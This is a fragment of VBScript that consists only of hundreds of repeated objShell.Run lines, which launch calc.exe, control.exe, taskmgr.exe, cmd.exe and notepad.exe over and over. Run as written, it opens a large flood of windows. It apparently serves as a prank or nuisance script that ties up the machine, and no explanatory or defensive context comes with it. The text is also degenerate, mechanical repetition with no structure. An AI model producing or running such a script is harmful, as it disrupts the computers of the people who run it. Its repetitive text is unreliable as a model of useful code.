
objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
